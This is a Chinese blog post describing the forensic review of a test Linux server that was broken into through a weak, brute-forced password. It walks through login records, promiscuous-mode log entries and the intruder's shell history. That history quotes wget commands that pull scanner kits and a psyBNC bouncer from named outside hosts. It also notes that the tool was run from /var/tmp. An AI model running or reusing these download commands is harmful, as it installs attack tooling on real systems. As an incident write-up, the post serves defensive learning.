Linux 安全设置

最新推荐文章于 2024-04-23 17:23:51 发布
最新推荐文章于 2024-04-23 17:23:51 发布
阅读量7k 收藏 1
点赞数
分类专栏: Linux 文章标签: linux 网络 破解 任务 制造 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ylp_1/article/details/6087309
版权

2010-12-20 17:01:41

 

前几天安装了一台Linux机器做测试用,为了方便做实验,将其放置到了公网上并且设置了一个简单的密码,但是周一登录机器时提示密码不正确。感觉出现问题了,开始进行检查。

  1. 1、执行last命令:

ZFS1ORB09EXRUN~G6]{_YUY

在18号凌晨有登录记录,如202.173.253.82及222.185.254.18等,此IP及时间登录的均为非法访问。

2、查看/var/log/message

$QY1D8F1{K_]J1CU}Y2R_U6

发现在message中存在有两条记录:

Dec 18 02:46:55 student kernel: device eth0 entered promiscuous mode
Dec 18 03:10:26 student kernel: device eth0 left promiscuous mode

可以看到网卡eth0 进入了promiscuous mode, 开始对网络通信进行抓包,正常情况下应该不会出现此提示,应该为入侵者开始对本地网络开始抓包。

OQ2(0FS@%$29DYSFU{4M6@Y

3、使用history查看历史操作记录

执行history后,查看执行过的历史命令,发现入侵者执行过如下命令

N$_EKK4)FL4C0KJ{3LA{4H6

w 查看当前在线用户

passwd 修改了密码

下载了一堆东西

wget  http://130.239.17.4/pub/dist/knoppix-dvd/KNOPPIX_V4.0.2DVD-2005-09-23-DE.iso
wget chicktool.com/.x/scanner/piata.tar     arhiva buna

wget http://root-arhive.zxq.net/scanner/scan.txt
wget http://root-arhive.zxq.net/scanner/scan.txt
wget http://chanhelp.is-the-boss.com/scanner/scan.zip
wget http://nasa.undernet.nm.ru/scan.tgz
wget http://nasa.undernet.nm.ru/scan.tgz
wget http://www.freewebs.com/iulianshooter/psyBNC2.3.2-4.tgz.tar.gz

H}__B]AC(K7O]E_`XTI_28X

在/var/tmp下面执行了psybnc。

Q8ZCU}C@X_G~A5}{KEG0B2B

NIG_}_V3O0)9N6N~S2}M3QT

 

4、查看 /var/log/secure

492B]UW25E@ZP[EF)V0TM3W

(E70UUI3PLH40_N3~Y{INNB

 

从secure文件可以看到入侵者使用暴力破解尝试root密码及其他用户。(切记:公网上的机器密码如果简单了,太容易被爆掉了)

 

5、入侵者下载的文件

MO5%O`7%X{6U6KIB~4_ME{R

 

 

关于入侵者下载的文件,暂时将文件列表给大家看下。等有时间好好分析一下,跟大家共享。

 

6、检查了定时任务没有发现有异常

 

7、使用find命令对近期修改的文件进行分析

 

 

 

总结:从上面上,这台机器由于密码过于简单被爆 掉了,不至于是入侵者太厉害还是初学者,留下的痕迹非常多,也或许是入侵者用来制造干扰的障眼法。

 

幸好只是一台用来做实验用的机器,没有任何重要的数据和资料,为了方便直接重新安装系统就可以了。

 

但是,教训还是要吸取的。没有安全的系统,如果把系统放到公网上一定要做足安全功课,千万马虎不得。

 

 

ylp_1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux中的message没有内容,ubuntu /var/log/下各个日志文件描述及修复无message文件和debug文件...
weixin_29122445的博客
05-05 1347
CSDNGitHububuntu /var/log/下各个日志文件描述及修复无message文件和debug文件AderXCoding/system/tools/syslog本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可, 转载请注明出处, 谢谢合作本文简单介绍ubuntu/var/log/下各个日志文件,方便出现错误的时候查询相应的log1 日志文件描述日志描述...
linux内核损坏的原因,Linux内核报错“General protection fault”原因
weixin_36127579的博客
05-01 3598
Linux系统中,偶尔遇到内核报告”General protection fault”或#GP Fault,然后panic,系统宕机。在Intel编程手册中指出,General protection fault中断号为13,表示内存访问或保护检查出现异常。14号中断就是我们所熟悉的页面异常。12#SSStack-Segment FaultFaultYesStack operations and ...
Linux安全设置实践.
09-10
Linux基本防护措施 使用sudo分配管理权限 提高SSH服务安全 SELinux安全防护 加密与解密应用 使用AIDE做入侵检测 扫描与抓包分析 案例1:部署audit监控文件 案例2:加固常见服务的安全 案例3:使用diff和patch工具打补丁 案例4:iptables基本管理 案例5:filter过滤和转发控制 案例6:防火墙扩展规则 案例7:配置SNAT实现共享上网 案例8:常用系统监控命令配置与使用Zabbix监控系统
如何快速分析出现性能问题的Linux服务器
架构师的成长之路的博客
05-10 584
转载https://www.cnblogs.com/wipan/p/9461005.html 下面工具的屏幕输出结果都来自这个出现问题的系统。 # 系统负载概览 uptime # 系统日志 dmesg | tail # CPU vmstat 1 mpstat -P ALL 1 pidstat 1 # Disk iostat -xz 1 # 内存 free -m # 网络 sar -n DEV 1 sar -n TCP,ETCP 1 # 系统概览 top 上面的工具都基于内核提供给用户.
系统日志:/var/log/messages
weixin_30460489的博客
12-20 1422
/var/log/messages 存放的是系统的日志信息,它记录了各种事件,基本上什么应用都能往里写日志,在做故障诊断时可以首先查看该文件内容 [root@mirh5_center1_111.231.133.13 ~]# tail /var/log/messages Dec 18 23:27:07 localhost kernel: [33100840.027421] possible...
BUG:使用/var/log/messages初步定位软件莫名退出问题
youzai2017的博客
07-13 612
Linux上运行的客户端软件,莫名退出,日志中没有异常和报错;确定异常退出时间点,在/var/log/messages系统日志中查找退出原因定位异常问题。
tcpdump 参数说明
个人学习记录
08-28 1822
常用参数简介: -i  指定监听网卡,用于机器有多个网卡的情况 -c  指定要监听的数据包的数量 -w  将监听到的数据包存入文件中 -r  从指定的文件中读取包(这些包一般通过-w选项产生); -s  snaplen -T  将监听到的包直接解释为指定的类型的报文,常见的类型有rpc (远程过程调用)和snmp(简单网络管理协议;) -f  将外部的Internet地址以数字的形式
【博客635】tcpdump原理与网卡混杂模式
qq_43684922的博客
03-12 2631
tcpdump原理是注册一种虚拟协议,使得每个包在遍历当前的协议列表时有机会被处理,如果tcpdump发现包符合要求就会使用skb_clone一份,送到用户态程序去分析。tcpdump还会使网络设备进入混杂模式,是为了让包能过进入网络协议栈,从而有机会被捕捉,这样才能抓到包。
服务器常见信息提示及含意
qq_37505609的博客
06-03 501
一般类的提示 : 1 eth1: Too much work at interrupt, IntrStatus=0x0001 ​ 这条提示的含意为. 某网卡的中断请求过多. 如果只是偶尔出现一次可忽略....
Red Hat Linux 安全设置方法
09-16
本文从各方面阐述了Red Hat Linux安全配置方法,如果您使用的是Windows Server 2003服务器的话,请看Windows Server 2003 系统配置方案。
LINUX安全设置之关于GRUB加密图文教程全解
09-15
关于LINUX的启动装载程序GRUB加密,算是一件很平常的工作。但是今天我在网上查这个东西,发现好多人都写的很简单,而且方法都比较过时。所以,在此我更新下GRUB加密。和大家分享下。
Linux安全设置.docx
03-16
Linux系统由于其出色的性能和稳定性、开放源代码的灵活性和可扩展性,以及较低廉的成本,而受到计算机工业界的广泛关注和应用。其系统的安全性就必须要加强。为了防止出错,在操作之前最好把文件备份 注意区分命令...
linux 启动apache libltdl.so.3: cannot open shared object file: No such file or directory异常
随心所欲
12-21 9519
<br />启动<br />[root@localhost ZendOptimizer-3.3.0-linux-glibc21-i386]# /opt/local/apache2/bin/apachectl stop<br />httpd: Syntax error on line 64 of /opt/local/apache2/conf/httpd.conf: Cannot load /opt/local/apache2/modules/libphp5.so into server: libltdl.s
安装Magento ,配置php 环境遇到lltdl错误
随心所欲
12-21 2011
安装 Magento时,需要配置php环境。 执行 ./configure --prefix=/opt/local/php --with-apxs2=/opt/local/apache2/bin/apxs --with-mysql=/opt/local/mysql --with-pdo-mysql=/opt/local/mysql --with-curl --with-libxml-dir=/opt/local/libxml2 --with-gd=/opt/local/gd2 --with-jpeg-d
Linux定时软件Cron
随心所欲
10-27 723
一、使用crond监控程序运行程序1. 使用cron来定期执行任务使用crond (cron监控程序)来定期运行一些任务,比如备份日志、数据库、把日志发送到自己邮箱等等操作都可以又定期运行程序来完成。crond是个脚本,每次Linux启动的时候都自动起到该脚本,该脚本是 /etc/rc.d/init.d 下面的,每次系统启动的时候就自动会启动该目录下的脚本。cron有两个配置文件,一个/e
linux18:进程等待
m0_73919066的博客
04-20 1068
1:子进程创建的目的是要完成父进程指派的某个任务,当子进程运行完毕退出时,父进程需要通过进程等待的方式,回收子进程资源,获取子进程退出信息(子进程有无异常?没有异常结果是否正确?检查退出码查看错误原因)2:父进程如果一直不回收,就可能造成子进程‘僵尸进程’的问题,子进程一直得不到父进程的回收,进而造成内存泄漏。3:子进程一旦变成僵尸状态,那就刀枪不入,“杀人不眨眼”的kill -9 也无能为力杀死一个已经死去的进程。只能通过进程等待将他进行回收。
arm架构Linux5.0内核连接脚本文件vmlinux.lds.S分析
最新发布
jianjian的博客
04-23 897
vmlinux.lds.S 是 Linux 内核中用于链接的脚本文件,用于定义内核对象文件的内存布局,即它告诉链接器如何将不同的内核代码段和数据段组合成一个最终的内核映像 vmlinux。编译内核源码生成内核文件的过程分两步,一个是“编译”,另一个是“链接”的过程,vmlinux.lds.S要做的就是告诉编译器如何链接编译好的各个内核.o文件,从而生成vmlinux文件。
简述linux安全机制
04-16
Linux安全机制是指在Linux操作系统中采取的一系列措施来保护系统和用户数据的安全性。以下是Linux安全机制的简要介绍: 1. 用户和权限管理:Linux通过用户和权限管理来限制对系统资源的访问。每个用户都有一个唯一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值